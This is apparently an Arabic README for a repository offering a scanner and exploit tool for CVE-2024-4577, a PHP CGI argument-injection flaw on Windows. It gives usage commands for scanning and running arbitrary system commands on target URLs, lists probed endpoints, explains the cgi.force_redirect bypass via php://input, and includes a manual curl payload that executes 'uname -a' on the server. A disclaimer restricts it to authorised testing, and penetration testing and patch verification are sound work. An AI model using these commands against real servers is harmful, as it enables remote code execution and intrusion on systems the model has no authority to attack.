
أداة ماسح واستغلال لـ CVE-2024-4577، ثغرة حقن وسائط PHP CGI تتيح تنفيذ كود عن بُعد على أنظمة Windows. تتضمن وحدات اكتشاف وتنفيذ أوامر.
CVE-2024-4577 هي ثغرة حقن وسائط في PHP CGI حرجة تؤثر على أنظمة ويندوز التي تشغّل PHP في وضع CGI. تسمح هذه الثغرة للمهاجمين عن بُعد بحقن وسائط في سطر أوامر PHP عبر عناوين URL مصممة خصيصًا، مما يؤدي إلى تنفيذ الأوامر عن بُعد (RCE).
يحتوي هذا المستودع على:
CVE-2024-4577.py: ماسح ضوئي لاكتشاف الأهداف المعرّضة للخطر.exploit.py: أداة استغلال ترسل كود PHP وتنفّذ أوامر النظام على الخادم المعرّض للخطر.⚠️ إخلاء مسؤولية
هذا المشروع مخصص للأغراض التعليمية والاختبار المصرح به فقط. أي إساءة استخدام لهذا الكود ليست مسؤولية المؤلف. استخدمه بمسؤولية وفي البيئات التي تملكها أو لديك إذن صريح لاختبارها فقط.
requestsثبّت التبعيات:
pip install -r requirements.txt
اكتشف ما إذا كان الهدف معرّضًا لـ CVE-2024-4577:
python3 CVE-2024-4577.py -u http://target.com

python3 CVE-2024-4577.py -f urls.txt

python3 CVE-2024-4577.py -u http://target.com -p /custom/path.php
يختبر الماسح الضوئي وأداة الاستغلال نقاط نهاية CGI الشائعة مثل:
/php-cgi/php-cgi.exe
/index.php
/test.php
/test.hello
يتجاوز الحمولة cgi.force_redirect ويضيف PHP خبيثًا في البداية باستخدام php://input.
نفّذ أوامر نظام تعسفية على هدف معرّض للخطر:
python3 exploit.py -u http://target.com -c "id"

python3 exploit.py -f urls.txt -c "id"

يمكنك أيضًا استغلال الثغرة يدويًا باستخدام curl
curl -X POST http://target.com/php-cgi/php-cgi.exe -d "<?php system('uname -a'); ?>"
يرسل هذا حمولة PHP تنفّذ uname -a على الخادم وتعيد المخرجات.

تم إصدار هذا الكود بموجب رخصة MIT. راجع LICENSE لمزيد من المعلومات.